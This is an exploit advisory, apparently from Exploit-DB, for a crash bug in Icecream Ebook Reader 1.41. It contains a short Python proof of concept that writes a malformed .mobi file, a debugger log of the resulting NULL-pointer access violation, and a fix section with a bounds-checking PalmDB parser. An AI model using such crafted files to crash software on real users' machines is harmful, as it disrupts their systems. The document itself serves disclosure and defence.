IceCream Ebook Reader 1.41 – Crash (PoC)

  • Author: Kapil Soni
    Date: 2015-01-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/35889/
  • # Exploit Title: [Icecream Ebook Reader v1.41 (.mobi/.prc) Denial of Service]
    # Date: [23/01/2015]
    # Exploit Author: [Kapil Soni]
    # Twitter: [@Haxinos]
    # Vendor Homepage: [http://icecreamapps.com/]
    # Version: [Icecream Ebook Reader v1.41]
    # Tested on: [Windows XP SP2]
    
    #Technical Details & Description:
    #================================
    #A memory corruption vulnerability was found in Icecream Ebook Reader v1.41. An attacker can crash the application with a malformed .mobi or .prc file.
    #Exploitation is local and needs user interaction: the victim has to open the crafted .mobi or .prc ebook in the reader.
    #The debugger output below shows the crash as a read through a NULL pointer (ecx=00000000) in Qt5Core!QTextCodec::toUnicode, preceded by QIODevice::read warnings about a negative maxSize, i.e. a length taken from the file is used without being validated.
    
    
    #Piece of Code
    #========================================================================
    
    #!/usr/bin/env python
    # Writes 1000 "A" bytes to crash.mobi; opening that file in Icecream Ebook
    # Reader v1.41 triggers the access violation shown in the log below.
    
    buffer = b"A" * 1000
    
    filename = "crash" + ".mobi"  # For testing with .prc, change the extension
    with open(filename, "wb") as f:  # binary mode, so the bytes are written unchanged
        f.write(buffer)
    
    print("File Successfully Created [1]")
    
    #========================================================================
    #Debugging and Error Log
    #========================
    
    #Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
    #Copyright (c) Microsoft Corporation. All rights reserved.
    #*** wait with pending attach
    #Symbol search path is: *** Invalid ***
    #****************************************************************************
    #* Symbol loading may be unreliable without a symbol search path. *
    #* Use .symfix to have the debugger choose a symbol path. *
    #* After setting your symbol path, use .reload to refresh symbol locations. *
    #****************************************************************************
    #Executable search path is: 
    #ModLoad: 00400000 00bd2000 C:\Program Files\Icecream Ebook Reader\ebookreader.exe
    #ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
    #ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
    #ModLoad: 67000000 673f1000 C:\Program Files\Icecream Ebook Reader\Qt5Core.dll
    #ModLoad: 00d30000 01158000 C:\Program Files\Icecream Ebook Reader\Qt5Gui.dll
    #.... Snipped
    #ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\userenv.dll
    #ModLoad: 01960000 0196c000 C:\Program Files\Icecream Ebook Reader\imageformats\qdds.dll
    #ModLoad: 01970000 01979000 C:\Program Files\Icecream Ebook Reader\imageformats\qgif.dll
    #ModLoad: 01b10000 01b18000 C:\Program Files\Icecream Ebook Reader\imageformats\qwbmp.dll
    #ModLoad: 01b20000 01b66000 C:\Program Files\Icecream Ebook Reader\imageformats\qwebp.dll
    #ModLoad: 09e70000 09f0f000 C:\Program Files\Icecream Ebook Reader\sqldrivers\qsqlite.dll
    #ModLoad: 20000000 202c5000 C:\WINDOWS\system32\xpsp2res.dll
    #(f9c.e34): Break instruction exception - code 80000003 (first chance)
    #eax=7ffd7000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
    #eip=7c901230 esp=0a67ffcc ebp=0a67fff4 iopl=0 nv up ei pl zr na pe nc
    #cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
    #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll - 
    #ntdll!DbgBreakPoint:
    #7c901230 cc              int     3
    #0:003> g
    #ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\Comdlg32.dll
    #ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll
    #ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
    #ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
    #... Snipped
    #ModLoad: 771b0000 77256000 C:\WINDOWS\system32\WININET.dll
    #ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll
    #ModLoad: 74e30000 74e9c000 C:\WINDOWS\system32\RichEd20.dll
    #ModLoad: 76980000 76988000 C:\WINDOWS\system32\LINKINFO.dll
    #QIODevice::read: Called with maxSize < 0
    #QIODevice::read: Called with maxSize < 0
    
    #(f9c.998): Access violation - code c0000005 (first chance)
    #First chance exceptions are reported before any exception handling.
    #This exception may be expected and handled.
    #eax=6723d888 ebx=00000000 ecx=00000000 edx=ffffffff esi=0012cd9c edi=0012cf38
    #eip=671da2a7 esp=0012cc30 ebp=0012cc90 iopl=0 nv up ei pl nz na pe cy
    #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
    #*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Icecream Ebook Reader\Qt5Core.dll - 
    #Qt5Core!QTextCodec::toUnicode+0x7:
    #671da2a7 8b11            mov     edx,dword ptr [ecx]  ds:0023:00000000=????????
    
    #Exploitation Technique:
    #============================
    #Local, DoS, Memory Corruption
    
    #Solution - Fix & Patch:
    #=======================
    #Restrict the maximum size the reader will work with: every length and offset parsed from the .mobi/.prc file must be non-negative, bounded by the file size and by a sane upper limit before it reaches QIODevice::read or QTextCodec::toUnicode, and add proper exception handling that rejects the file on an over-sized request instead of continuing.
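    #The following is an added example, not code from the advisory or from Icecream Apps: a defensive parser for the PalmDB container that .prc/.mobi files use, showing the bounds checks the fix above asks for. The header layout is the public PalmDB layout; the 4096-record and 16 MiB limits, the constructed sample files and the assumption that the reader's own parser trips over record lengths in the same way are ours, not something the advisory establishes.

```python
import struct

# PalmDB container layout (public format; .prc/.mobi files are PalmDB databases).
# The reader's real parser is not available, so the checks below are an assumed
# hardening, not vendor code.
PALMDB_HEADER_LEN = 78      # name[32] ... type[4]@60 creator[4]@64 ... numRecords u16 @76
RECORD_ENTRY_LEN = 8        # per record: offset u32, attributes u8, uniqueID u24
KNOWN_TYPES = {(b"BOOK", b"MOBI"), (b"TEXt", b"REAd")}
MAX_RECORDS = 4096                  # assumed sane upper bound for an ebook
MAX_RECORD_SIZE = 16 * 1024 * 1024  # assumed upper bound for a single record


class MalformedPalmDB(ValueError):
    """Raised instead of ever handing a bad length to the decoding layer."""


def build_palmdb(records, db_type=b"BOOK", creator=b"MOBI"):
    """Build a minimal, well-formed PalmDB container around the given payloads."""
    header = bytearray(PALMDB_HEADER_LEN)
    header[0:32] = b"sample".ljust(32, b"\x00")
    header[60:64] = db_type
    header[64:68] = creator
    struct.pack_into(">H", header, 76, len(records))
    entries = bytearray()
    offset = PALMDB_HEADER_LEN + len(records) * RECORD_ENTRY_LEN + 2  # +2: traditional gap
    for uid, rec in enumerate(records):
        entries += struct.pack(">I", offset) + struct.pack(">I", uid)  # attrs=0, uid in low 24 bits
        offset += len(rec)
    return bytes(header) + bytes(entries) + b"\x00\x00" + b"".join(records)


def parse_palmdb(data):
    """Return [(offset, length), ...] per record, or raise MalformedPalmDB.

    Every value taken from the file is bounds-checked before it is used as a
    size or offset, so a negative or oversized read never reaches the consumer.
    """
    size = len(data)
    if size < PALMDB_HEADER_LEN:
        raise MalformedPalmDB("file shorter than the %d-byte header" % PALMDB_HEADER_LEN)

    (num_records,) = struct.unpack_from(">H", data, 76)
    if num_records == 0 or num_records > MAX_RECORDS:
        # 1000 x "A" decodes here as 0x4141 = 16705 records
        raise MalformedPalmDB("implausible record count %d" % num_records)

    db_type, creator = bytes(data[60:64]), bytes(data[64:68])
    if (db_type, creator) not in KNOWN_TYPES:
        raise MalformedPalmDB("unexpected type/creator %r/%r" % (db_type, creator))

    list_end = PALMDB_HEADER_LEN + num_records * RECORD_ENTRY_LEN
    if list_end > size:
        raise MalformedPalmDB("record list runs past end of file")

    offsets = [struct.unpack_from(">I", data, PALMDB_HEADER_LEN + i * RECORD_ENTRY_LEN)[0]
               for i in range(num_records)]

    # Offsets must be monotonic and inside the file; otherwise the naive
    # length = next_offset - offset goes negative or past EOF.
    prev = list_end
    for idx, off in enumerate(offsets):
        if off < prev or off > size:
            raise MalformedPalmDB("record %d offset 0x%x out of range" % (idx, off))
        prev = off

    records = []
    for idx, off in enumerate(offsets):
        end = offsets[idx + 1] if idx + 1 < num_records else size
        length = end - off  # never negative after the pass above
        if length > MAX_RECORD_SIZE:
            raise MalformedPalmDB("record %d length %d exceeds limit" % (idx, length))
        records.append((off, length))
    return records


def safe_parse(data):
    """(records, None) when the file is accepted, (None, reason) when rejected."""
    try:
        return parse_palmdb(data), None
    except MalformedPalmDB as exc:
        return None, str(exc)


# Constructed inputs (not files from the advisory).
POC_FILE = b"A" * 1000                            # what the PoC script writes
GOOD_FILE = build_palmdb([b"hello", b"world"])    # 106 bytes, records at 96 and 101

# Same container, record 1's offset moved before record 0: a naive parser
# computes a negative length for record 0 (the kind of value behind "maxSize < 0").
BACKWARD_OFFSET_FILE = bytearray(GOOD_FILE)
struct.pack_into(">I", BACKWARD_OFFSET_FILE, PALMDB_HEADER_LEN + RECORD_ENTRY_LEN, 50)
BACKWARD_OFFSET_FILE = bytes(BACKWARD_OFFSET_FILE)

# Same container, record 1's offset pointing far past end of file.
PAST_EOF_FILE = bytearray(GOOD_FILE)
struct.pack_into(">I", PAST_EOF_FILE, PALMDB_HEADER_LEN + RECORD_ENTRY_LEN, 0xFFFFFFFF)
PAST_EOF_FILE = bytes(PAST_EOF_FILE)

if __name__ == "__main__":
    for name, blob in [("good", GOOD_FILE), ("poc", POC_FILE),
                       ("backward", BACKWARD_OFFSET_FILE), ("past-eof", PAST_EOF_FILE)]:
        recs, err = safe_parse(blob)
        print("%-9s %s" % (name, recs if err is None else "rejected: " + err))
```

    #The order of the checks matters: the record count is validated before the record list is touched, and all offsets are validated before any length is derived from them, so no subtraction in the parser can go negative and no read can be issued past the end of the buffer.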
    
    #Author:
    #=======
    #Kapil Soni (Haxinos)